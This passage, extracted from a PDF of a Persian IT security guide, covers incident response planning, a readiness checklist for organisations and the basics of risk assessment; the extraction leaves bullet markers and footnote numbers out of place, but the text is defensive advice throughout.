‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ )ﻛﻪ‬
‫ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤـﻴﻦ ﻣﻄﻠـﺐ ﺑﺮﺭﺳـﻲ ﺷـﺪﻩ(‪ ،‬ﺑـﺮ ﺭﻭﻱ ﺗﺨﺮﻳـﺐ ﻣﺘﻤﺮﻛـﺰ‬
‫ﻧﻤﻲﺷﻮﻧﺪ ﺍﻣﺎ ﺗﻌﺪﺍﺩ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻭ ﮔﺎﻫﻲ ﺑﻪ ﺻﻮﺭﺕ ﺗﻴﻤﻲ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻦ ﻗﺎﻟـﺐ ﺗﻬﺪﻳـﺪ ﺑﺰﺭﮔﺘـﺮﻱ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫ﻣﻲﺁﻳﻨﺪ‪"Script Kiddie" .‬ﻫﺎ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺧـﻮﺩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻭ ﺍﺯ‬
‫ﻲ‬
‫ﺁﻥ ﻃﺮﻳﻖ ﺍﺩﻋﺎﻱ ﺷﻬﺮﺕ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﻭﺍﻗـﻊ ﺁﻧﻬـﺎ ﺑـﻪ ﺑـﺪﻧﺎﻣ ﹺ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﺣﺠﻢ ﺯﻳﺎﺩ ﺣﻤﻼﺕ ﺧﻮﺩ ﺍﻓﺘﺨﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑـﻪ ﻋﻠـﺖ‬
‫ﺭﻭﺍﺝ ﺍﻳﻦ ﺗﻬﺪﻳﺪ‪ ،‬ﺳـﺎﺯﻧﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺆﺛﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﻧﻔـﻮﺫ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳـﺎﺏ‪ ٦١‬ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬
‫‪١٤٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻋﻨﺎﺻﺮ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴـﻞ ﺷـﺪﻧﺪ‪ ،‬ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻧﻴـﺰ‬
‫ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﺭﻭﺍﻟﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﻪ ﻳﺎﺑﺪ‪.‬‬
‫ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺣﻮﺯﻩﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺫﻳـﻞ‬
‫ﺑﺎﺷﺪ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫•‬
‫ﺩﺍﻧﺴﺘﻦ ﺯﻣﺎﻧﻲ ﻛﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻳﺪ ‪ -‬ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻛــﺸﻒ ﺗﻬــﺎﺟﻢ ﻭ ﻫﻮﺷــﻴﺎﺭﻱ‬
‫ﺩﺍﺧﻠﻲ‪.‬‬
‫•‬
‫ﻓﺮﺍﻫﻢ ﺳﺎﺧﺘﻦ ﺳﻨﺎﺭﻳﻮﻱ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜـﻦ ‪ -‬ﺗﻔﻜـﺮ‬
‫ﺩﺭﺑﺎﺭﺓ ﺗﺄﺛﻴﺮﺍﺕ ﻣﻀﺎﻋﻔﻲ ﻛـﻪ ﻧﻘـﺾ ﺍﻣﻨﻴـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﺮﺍﻳﺘﺎﻥ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻣﻜﺘﻮﺏ ﺑﺮﺍﻱ ﺛﺒـﺖ ﻭﻗـﺎﻳﻊ ﺍﻣﻨﻴﺘـﻲ‬
‫)ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﻧﻔﻮﺫ‪ - (٦٢‬ﺍﻳﻦ ﺳﻨﺪ ﻛﺘﺒﻲ ﺑﻪ ﺗﺤﻠﻴﻞ ﻭﻗﺎﻳﻊ‬
‫ﻣﻨﻔﺮﺩ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﻣﻮﻓـﻖ ﺩﺭ ﺁﻳﻨـﺪﻩ ﻛﻤـﻚ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫•‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻳﻚ ﻣﺘﺨﺼﺺ ﺩﺭﺻـﻮﺭﺕ ﻧﻴـﺎﺯ ‪ -‬ﺑـﺮ ﻣﺒﻨـﺎﻱ‬
‫ﺭﺧﺪﺍﺩﻫﺎ ﻳﺎ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﺔ ﻣـﺸﺎﻭﺭﺓ ﺩﻭﺭﻩﺍﻱ‪ .‬ﺍﺯ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺧﻮﺩﺧﻮﺍﻧﺪﻩ )ﻛﺴﺎﻧﻴﻜﻪ ﻣـﺪﻋﻲ ﻧﻔـﻮﺫﮔﺮﻱ‬
‫ﻫﺴﺘﻨﺪ( ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﻣﺒﺤـﺚ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺯ ﻃﺮﻳـﻖ‬
‫‪٦٣‬‬
‫ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﺑﺨﺶ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ‪.‬‬
‫•‬
‫ﻓﺮﺍﻫﻢ ﻧﻤﻮﺩﻥ ﺁﻣﻮﺯﺵ ﻻﺯﻡ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻓﻨﻲ ﻭ ﺳـﺎﻳﺮ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ‪ -‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻘﺼﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺎﺷﻲ ﺍﺯ ﻛﻤﺒﻮﺩ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺩﺭ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻧﺤﻮﺓ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺪﺍﻧﺪ‪.‬‬
‫•‬
‫ﺗﻌﻴﻴﻦ ﻳـﻚ ﻧﻘﻄـﺔ ﺗﻤـﺎﺱ ‪ -‬ﺍﻳـﻦ ﻓـﺮﺩ ﺑﺎﻳـﺪ ﺩﺭ ﺣـﻮﺯﺓ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺘﺨﺼﺺ ﺑﺎﺷﺪ ﻭ ﻭﻗﺎﻳﻊ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ‬
‫ﺍﻋﻀﺎﻱ ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﮔﺰﺍﺭﺵ ﺩﻫﺪ‪.‬‬
‫•‬
‫ﺩﺭﻙ ﻭ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺍﻫﺪﺍﻑ ‪ -‬ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﻪ ﻳﺎ ﺑﺮﺧـﻲ‬
‫ﺍﺯ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﻣﻲﺷﻮﺩ‪:‬‬
‫‪Break-In Plan‬‬
‫‪۶۳‬‬
‫ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻮﺳـﻂ ﻭ ﺑـﺰﺭﮒ ﻋﻤﻠـﻲ ﺍﺳـﺖ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻳـﺸﺎﻥ ﻭﺍﺑـﺴﺘﮕﻲ‬
‫ﺯﻳﺎﺩﻱ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭ ﻫﺪﻓﺸﺎﻥ ﺑﺎﺯﺍﺭ ﻓﻨﻲ ﭘﻴﺸﺮﻓﺘﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺩﻭﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﻟﻘﻮﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻭﺟﻬﺔ ﻓﻨﻲ ﺷﺮﻛﺖ ﻭ‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻥ ﻧﻈﺮﺍﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ ﻛﻪ ﺑﺎﻋـﺚ‬
‫ﺟﻮﺳﺎﺯﻱ ﻣﺜﺒﺖ ﻳﺎ ﻣﻨﻔﻲ ﺷﻮﺩ‪.‬‬
‫‪62‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ؛‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺣﻤﻠﻪ؛‬
‫ﺍﻋﻼﻡ ﺣﻤﻠﻪ ﺑﻪ ﻣﺪﻳﺮﺕ ﺍﺭﺷﺪ؛‬
‫ﺛﺒﺖ ﻭﻗﺎﻳﻊ؛‬
‫‪٦٤‬‬
‫ﺗﻬﻴﺔ ﺗﺼﺎﻭﻳﺮ ﺁﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ؛‬
‫ﺗﻤﺎﺱ ﺑﺎ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪٦٥‬؛‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻢ؛‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ؛ ﻭ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﻭﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺮﺩ‪.‬‬
‫ﺍﮔﺮ ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ‬
‫ﻣﺠﺪﺩﹰﺍ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﻭ ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﺑﻮﺩﺟﻪ ﻭ ﺗـﺪﺍﺭﻛﺎﺕ ﺑـﻪ ﺷـﻤﺎ‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺩﺭ ﺍﺭﺯﻳـﺎﺑﻲ ﺳـﺎﺯﻣﺎﻥ‪،‬‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳﺆﺍﻻﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺷـﻤﺎ ﺩﺭ‬
‫ﺗﻌﺮﻳﻒ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﻗﻮﺕ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﻛﻤـﻚ ﻛﻨﻨـﺪ‪ .‬ﻳـﻚ‬
‫ﻓﻬﺮﺳﺖ ﻧﻤﻮﻧﻪ ﻛﻪ ﺑﺮ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣـﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗﻬـﺎﺟﻢ‬
‫ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﺭﺍ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻲﺑﻴﻨﻴﺪ‪:‬‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺭﺧﺪﺍﺩ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﺗـﺮﻣﻴﻢ ﻭ ﺳـﺮﻣﺎﻳﺔ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﭘﺎﺳـﺨﮕﻮﻳﻲ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﻧﺪ؟‬
‫ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﻗﺎﺑﻞ ﻓﻬﻢ ﻭ ﺑﻪ ﺭﻭﺯ ﻫﺴﺘﻨﺪ؟‬
‫ﺁﻳﺎ ﻃﺮﺣﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺁﺛﺎﺭ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‬
‫ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﺳﺮﻣﺎﻳﺔ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺭﺧﺪﺍﺩ ﺗﺨﺼﻴﺺ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺪﻳﺮﻳﺖ‪:‬‬
‫‪ o‬ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ‬
‫ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺗﻤﺎﻡ ﻃﻮﻝ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﻭ ﻫـﺮ‬
‫ﻫﻔﺖ ﺭﻭﺯ ﻫﻔﺘﻪ ﻫﺴﺘﻨﺪ؟‬
‫‪ o‬ﺍﮔﺮ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ‪ ،‬ﺁﻳﺎ ﺭﺍﻫﻲ‬
‫ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫‪Snapshots‬‬
‫‪Computer Security Incident Response Team‬‬
‫‪64‬‬
‫‪65‬‬
‫‪١٤١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫‪ o‬ﺁﻳﺎ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ‬
‫)ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺍﺯ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﺍﺣﺘﻤـﺎﻟﻲ ﺗﻌﺮﻳـﻒ‬
‫ﺷﺪﻩ ﺍﺳﺖ؟‬
‫‪ o‬ﺁﻳﺎ ﺭﻭﺍﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺯﻣﺎﻥ ﺗﻤﺎﺱ ﺑﺎ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ‬
‫ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤـﻚ ﻭ ﻓـﺮﺩﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﻳـﻦ‬
‫ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺑﻊ ﻓﻨﻲ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻛﺮﺩﻥ ﻳﺎ ﭘﺎﻳـﺎﻥ ﺩﺍﺩﻥ ﺑـﻪ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺕ ﺁﻏﺎﺯ ﻳﺎ ﭘﺎﻳﺎﻥ ﻃﺮﺡ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﺁﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﻛـﺸﻒ ﺗﻬـﺎﺟﻢ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻭ ﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻨﺎﺳﺎﻳﻲ‪ ٦٦‬ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺣﻤﻼﺕ ﻧﺎﺷﻨﺎﺧﺘﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ؟‬
‫ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﻻﻳﻪﺑﻨـﺪﻱﺷـﺪﻩ‬
‫ﺣﻤﻼﺗﻲ ﻛﻪ ﺑـﻪ ﺷـﺒﻜﻪ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻛـﺸﻒ ﻭ ﺍﺯ‬
‫ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟‬
‫ﺁﻳــﺎ ﺭﻭﻱ ﺷــﺒﻜﻪ ﻣــﻲﺗــﻮﺍﻥ ﺣﻤــﻼﺕ ﺭﺍ ﺑــﺴﺎﺩﮔﻲ‬
‫ﺗﻌﻘﻴﺐ ﻛﺮﺩ؟‬
‫ﻲ ﺍﻣﻨﻴــﺖ‪ ،‬ﻛﻠﻴــﺔ‬
‫ﻱ ﺭﺳــﻤ ﹺ‬
‫ﺁﻳــﺎ ﺑــﺮ ﺍﺳــﺎﺱ ﻣﻤﻴــﺰ ﹺ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ؟‬
‫‪Detection Software‬‬
‫‪66‬‬
‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻳﻦ‬
‫ﺳﺌﻮﺍﻻﺕ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪ .۱‬ﺳﻌﻲ ﺩﺭ ﺣﻔﻆ ﭼﻪ ﭼﻴﺰﻱ ﺩﺍﺭﻡ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻘـﺪﺭ ﺑـﺮﺍﻱ‬
‫ﻣﻦ ﺍﺭﺯﺵ ﺩﺍﺭﺩ؟‬
‫‪ .۲‬ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺭﻡ؟‬
‫‪ .۳‬ﺣﺎﺿــﺮﻡ ﭼﻘــﺪﺭ ﺯﻣــﺎﻥ‪ ،‬ﺗــﻼﺵ ﻭ ﺳــﺮﻣﺎﻳﻪ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ‬
‫ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻢ؟‬
‫‪٦٧‬‬
‫ﺱ ﻓﺮﺁﻳﻨـﺪﻱ ﺑـﻪ ﻧـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ‬
‫ﺍﻳﻦ ﺳﺆﺍﻻﺕ‪ ،‬ﺍﺳﺎ ﹺ‬
‫ﺷﻜﻞ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺑﺨﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨـﺪ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﻧﺪﺍﻧﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﭼﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ‬
‫ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧـﺴﺖ ﮔﺎﻣﻬـﺎﻱ‬
‫ﺁﻧﺮﺍ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻭﻗﺘـﻲ ﺧﻄـﺮﺍﺕ ﺭﺍ ﺷـﻨﺎﺧﺘﻴﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﻨﻮﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﻩ‬
‫ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺭﺍ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔـﺮ ﺧﻄـﺮ ﻗﻄـﻊ ﺑـﺮﻕ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺍﺳﺖ‪ ،‬ﺑﺎﻳﺪ ﺍﻳﻦ ﺧﻄﺮ ﺭﺍ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ٦٨UPS‬ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪.‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﺔ ﻛﻠﻴﺪﻱ ﺍﺳﺖ‪:‬‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺍﺭﺯﺵ ﺁﻧﻬﺎ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ‬
‫ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻳـﻚ‬
‫ﺭﻭﺵ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑـﺴﻴﺎﺭ ﻣﻮﻓـﻖ ﺑـﻮﺩﻩ‪ ،‬ﺍﻳﺠـﺎﺩ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬
‫ﻲ ﺩﺭﻭﻥﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺷـﻤﺎ‬
